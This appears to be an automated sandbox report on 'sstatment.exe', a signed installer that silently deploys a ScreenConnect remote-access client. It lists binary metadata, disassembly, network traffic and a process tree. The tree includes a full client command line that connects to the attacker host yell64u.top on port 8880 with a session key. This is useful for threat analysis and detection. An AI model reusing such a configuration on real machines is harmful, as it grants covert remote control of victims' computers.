                                                                                  Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                  Signature Valid:true
                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                  Signature Validation Error:The operation completed successfully
                                                                                  Error Number:0
Not Before, Not After
• Not Before: 17/08/2022 01:00:00, Not After: 16/08/2025 00:59:59
                                                                                  Subject Chain
                                                                                  • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                  Version:3
                                                                                  Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                  Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                  Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                  Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                  Instruction
                                                                                  call 00007F58F8B5173Ah
                                                                                  jmp 00007F58F8B511EFh
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push 00000000h
                                                                                  call dword ptr [0040D040h]
                                                                                  push dword ptr [ebp+08h]
                                                                                  call dword ptr [0040D03Ch]
                                                                                  push C0000409h
                                                                                  call dword ptr [0040D044h]
                                                                                  push eax
                                                                                  call dword ptr [0040D048h]
                                                                                  pop ebp
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 00000324h
                                                                                  push 00000017h
                                                                                  call dword ptr [0040D04Ch]
                                                                                  test eax, eax
                                                                                  je 00007F58F8B51377h
                                                                                  push 00000002h
                                                                                  pop ecx
                                                                                  int 29h
                                                                                  mov dword ptr [004148D8h], eax
                                                                                  mov dword ptr [004148D4h], ecx
                                                                                  mov dword ptr [004148D0h], edx
                                                                                  mov dword ptr [004148CCh], ebx
                                                                                  mov dword ptr [004148C8h], esi
                                                                                  mov dword ptr [004148C4h], edi
                                                                                  mov word ptr [004148F0h], ss
                                                                                  mov word ptr [004148E4h], cs
                                                                                  mov word ptr [004148C0h], ds
                                                                                  mov word ptr [004148BCh], es
                                                                                  mov word ptr [004148B8h], fs
                                                                                  mov word ptr [004148B4h], gs
                                                                                  pushfd
                                                                                  pop dword ptr [004148E8h]
                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                  mov dword ptr [004148DCh], eax
                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                  mov dword ptr [004148E0h], eax
                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                  mov dword ptr [004148ECh], eax
                                                                                  mov eax, dword ptr [ebp-00000324h]
                                                                                  mov dword ptr [00414828h], 00010001h
                                                                                  Programming Language:
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x129c4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x533080 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x546200 | 0x1dde0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x54a000 | 0xea8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11f20 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x11e60 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb1af | 0xb200 | d9fa6da0baf4b869720be833223490cb | False | 0.6123156601123596 | data | 6.592039633797327 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x6078 | 0x6200 | 8b45a1035c0de72f910a75db7749f735 | False | 0.41549744897959184 | data | 4.786621464556291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x14000 | 0x11e4 | 0x800 | 1f4cc86b6735a74429c9d1feb93e2871 | False | 0.18310546875 | data | 2.265083745848167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x16000 | 0x533080 | 0x533200 | 0cb59c276652808eb7200fdad38bae5b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x54a000 | 0xea8 | 0x1000 | a93b0f39998e1e69e5944da8c5ff06b1 | False | 0.72265625 | data | 6.301490309336801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
FILES | 0x163d8 | 0x86000 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.39622565881529853
FILES | 0x9c3d8 | 0x1a4600 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.5111637115478516
FILES | 0x2409d8 | 0x1ac00 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.4415614047897196
FILES | 0x25b5d8 | 0x2ec320 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.9812068939208984
FILES | 0x5478f8 | 0x1600 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3908025568181818
RT_MANIFEST | 0x548ef8 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
DLL | Import
mscoree.dll | CorBindToRuntimeEx
KERNEL32.dll | GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
OLEAUT32.dll | VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 19:20:07.771992922 CEST | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Oct 15, 2024 19:20:07.777002096 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:07.777957916 CEST | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Oct 15, 2024 19:20:09.013226032 CEST | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Oct 15, 2024 19:20:09.018479109 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:09.329220057 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:09.366509914 CEST | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Oct 15, 2024 19:20:09.371493101 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:09.691298008 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:09.705992937 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:09.706060886 CEST | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Oct 15, 2024 19:20:10.609119892 CEST | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Oct 15, 2024 19:20:10.609163046 CEST | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Oct 15, 2024 19:20:10.614202023 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:10.614214897 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:10.614223957 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:10.614231110 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:10.614238977 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:11.724060059 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:20:11.799412966 CEST | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Oct 15, 2024 19:21:11.736869097 CEST | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Oct 15, 2024 19:21:11.745641947 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Oct 15, 2024 19:22:11.752692938 CEST | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Oct 15, 2024 19:22:11.757548094 CEST | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 19:20:07.099672079 CEST | 62345 | 53 | 192.168.2.4 | 1.1.1.1
Oct 15, 2024 19:20:07.734087944 CEST | 53 | 62345 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 19:20:07.099672079 CEST | 192.168.2.4 | 1.1.1.1 | 0xc26a | Standard query (0) | yell64u.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 19:20:07.734087944 CEST | 1.1.1.1 | 192.168.2.4 | 0xc26a | No error (0) | yell64u.top | | 85.239.34.190 | A (IP address) | IN (0x0001) | false

                                                                                  Target ID:0
                                                                                  Start time:13:20:00
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Users\user\Desktop\sstatment.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\sstatment.exe"
                                                                                  Imagebase:0xa00000
                                                                                  File size:5'652'448 bytes
                                                                                  MD5 hash:9ABA870D429CB8FA53103AE4B7182AF6
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1716168698.00000000054E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1703239568.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:13:20:00
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                                                                                  Imagebase:0xb30000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:13:20:01
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                  Imagebase:0x7ff7e34e0000
                                                                                  File size:69'632 bytes
                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:3
                                                                                  Start time:13:20:01
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 59D7E5A298D3BDCE75E1864C9D19AFAE C
                                                                                  Imagebase:0xb30000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:13:20:01
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2C46.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6171828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                  Imagebase:0xb30000
                                                                                  File size:61'440 bytes
                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:13:20:03
                                                                                  Start date:15/10/2024
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 538DC24C91048081BEAA643BBADB9B49
                                                                                  Imagebase:0xb30000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

Target ID: 6
Start time: 13:20:03
Start date: 15/10/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding 03E219FD9DD5FBE89B8F3FB198F75C6D E Global\MSI0000
Imagebase: 0xb30000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 13:20:03
Start date: 15/10/2024
Path: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c="
Imagebase: 0x550000
File size: 95'520 bytes
MD5 hash: 361BCC2CB78C75DD6F583AF81834E447
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: moderate
Has exited: false

Target ID: 8
Start time: 13:20:05
Start date: 15/10/2024
Path: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "fda0d9d1-006f-4842-aa6c-538f6b380dd3" "User"
Imagebase: 0xb50000
File size: 601'376 bytes
MD5 hash: 20AB8141D958A58AADE5E78671A719BF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1751452083.0000000000B52000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.2951121730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: moderate
Has exited: false

Target ID: 9
Start time: 13:20:08
Start date: 15/10/2024
Path: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "3ed7d239-c254-4fd8-943e-8cdfefb70c7f" "System"
Imagebase: 0xe10000
File size: 601'376 bytes
MD5 hash: 20AB8141D958A58AADE5E78671A719BF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1801845823.0000000003171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

                                                                                    • API String ID:
                                                                                    • Opcode ID: 4bc87b887e0bf752f89c86bda90f54e2093df6038151b07f720f27bc5f7d9d4b
                                                                                    • Instruction ID: 33c0b726618342602fcf254befc6a0756019764f36355bf98ca5f9a14f582a03
                                                                                    • Opcode Fuzzy Hash: 4bc87b887e0bf752f89c86bda90f54e2093df6038151b07f720f27bc5f7d9d4b
                                                                                    • Instruction Fuzzy Hash: 6E513C75A10615CFCB04CFA9C88499DBBF6FF8A700B2581AAE505EF361DB71AD45CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7316c9af632ca5806f37f6eb85b81804545b9fd8a77315e38cc840dbfaff1e48
                                                                                    • Instruction ID: 9f6ecdd2cdf504adfb8efb042d906f6c23bd47ae7a162b8a42e8fb985639c4bf
                                                                                    • Opcode Fuzzy Hash: 7316c9af632ca5806f37f6eb85b81804545b9fd8a77315e38cc840dbfaff1e48
                                                                                    • Instruction Fuzzy Hash: 4F61FD38610A048FCB50DF69C9889AEBBF6FF8871471185A9E51ADB735DB30EC05CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cadf64d7d3e175ceec807ca4d0e8e28e68a54f859d8674ba3d56228088ff0264
                                                                                    • Instruction ID: 34cc8991e226d771a573f6b920da004e6246727378d8f148c711fd825a149da5
                                                                                    • Opcode Fuzzy Hash: cadf64d7d3e175ceec807ca4d0e8e28e68a54f859d8674ba3d56228088ff0264
                                                                                    • Instruction Fuzzy Hash: 5B516E30E103099FDB05DFB5D888BDDBBB2FF89300F108659E104AB295DB75A985CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4dbc317790ee3343c3b05ca85cd46fb859d9f6658a0ce6e906b00e8155928acd
                                                                                    • Instruction ID: 761e671b2150e196500c10245bd500b3c3f8b29b397ee6f83718ed607b5d6c2c
                                                                                    • Opcode Fuzzy Hash: 4dbc317790ee3343c3b05ca85cd46fb859d9f6658a0ce6e906b00e8155928acd
                                                                                    • Instruction Fuzzy Hash: 9B512B30700605CFCB18CF29D8D8A6A7BB5EF89325B0445A8D856DF3A9DB34E856CF91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: be7d373986de2a4499bb64d719f60854fcf157a683f0edfb46069d12ff6cf591
                                                                                    • Instruction ID: 40720bdd9c16beda14dde5ccb559502aa36d94f8f5a5bb929f8b7664cbd7543a
                                                                                    • Opcode Fuzzy Hash: be7d373986de2a4499bb64d719f60854fcf157a683f0edfb46069d12ff6cf591
                                                                                    • Instruction Fuzzy Hash: 53517B70E143099FCB01DFB4D884BDDBBB1FF89300F108659E104AB2A5DB75A986CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 12f18043afcb66c659cb37aeb983403dd80e4bd6ed8d42f918e1673fa2711109
                                                                                    • Instruction ID: f70bd02c4389dc13b84ccaf64872cd3bc4457c323444554d3e66fcaf052a0aea
                                                                                    • Opcode Fuzzy Hash: 12f18043afcb66c659cb37aeb983403dd80e4bd6ed8d42f918e1673fa2711109
                                                                                    • Instruction Fuzzy Hash: 6941F97A700605DFDB04DB99C584A6A77FAFFCC214B248059E90ADB329DB31ED02DB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b12bb00519aef4021648ded7bfa6b3057b5735e9ea396d90895d1890bea9c3f2
                                                                                    • Instruction ID: c2ccd504df4a8f3bf2fc4d834817dc956a76ffb7c36fa03b00535719c228d0c6
                                                                                    • Opcode Fuzzy Hash: b12bb00519aef4021648ded7bfa6b3057b5735e9ea396d90895d1890bea9c3f2
                                                                                    • Instruction Fuzzy Hash: C3313C31B002068FDB149F69C0986AEBBF6EF8A354F148869D407EB794DF71DC018B90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 14261ae8aa52591e78d8f4d77c3b132fa230c9ebaccef9515fcba0917b25f1a9
                                                                                    • Instruction ID: 6b81333c25be038ad9a9de4c4ffb6182140d89c72b965ce21ea463d734bd2f56
                                                                                    • Opcode Fuzzy Hash: 14261ae8aa52591e78d8f4d77c3b132fa230c9ebaccef9515fcba0917b25f1a9
                                                                                    • Instruction Fuzzy Hash: 18416B78A00205DFDB14DFA4D599BADBBF2EF48314F148518E406AB3A5CF70AD46CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7e64c5ebd7ba509949a7d2d86dd2fa1188d94ef71dc259b67946f49e46faf54a
                                                                                    • Instruction ID: 6bc51f3ca4c119765d102458c8505b467a1b7951161951464a1f7a4d4d7f6229
                                                                                    • Opcode Fuzzy Hash: 7e64c5ebd7ba509949a7d2d86dd2fa1188d94ef71dc259b67946f49e46faf54a
                                                                                    • Instruction Fuzzy Hash: 8A314135A00508DFCB00DFA9D9809D9BBB5FF4D324B14819AE915AB366D732ED02CB60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb3783e8ae742a5a9621ae26effb873fae1c23e00433f07a2e3a8b4f969fbdad
                                                                                    • Instruction ID: 54df908c0d5bfc167dcc443987db9de556c5f40abd520136861666486870a5cb
                                                                                    • Opcode Fuzzy Hash: bb3783e8ae742a5a9621ae26effb873fae1c23e00433f07a2e3a8b4f969fbdad
                                                                                    • Instruction Fuzzy Hash: F9415F74E012199FDB58DFAAD984AEEBBF2BF88300F14912AD815B7354DB345942CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_2ad0000_sstatment.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9553af62d1070dae4d9db5f69588ed463ae331fcad1df80756e5ed645ed1be10
                                                                                    • Instruction ID: 78643cb5b554fa48c31f4855ac0d572cb02dea2b76c985f30ff2b174149da790
                                                                                    • Opcode Fuzzy Hash: 9553af62d1070dae4d9db5f69588ed463ae331fcad1df80756e5ed645ed1be10
                                                                                    • Instruction Fuzzy Hash: 2921B4313402411FC705F7BAA9A56AFB6E7EFC66543518A2AD016CB358DF70EC0687B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703193787.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
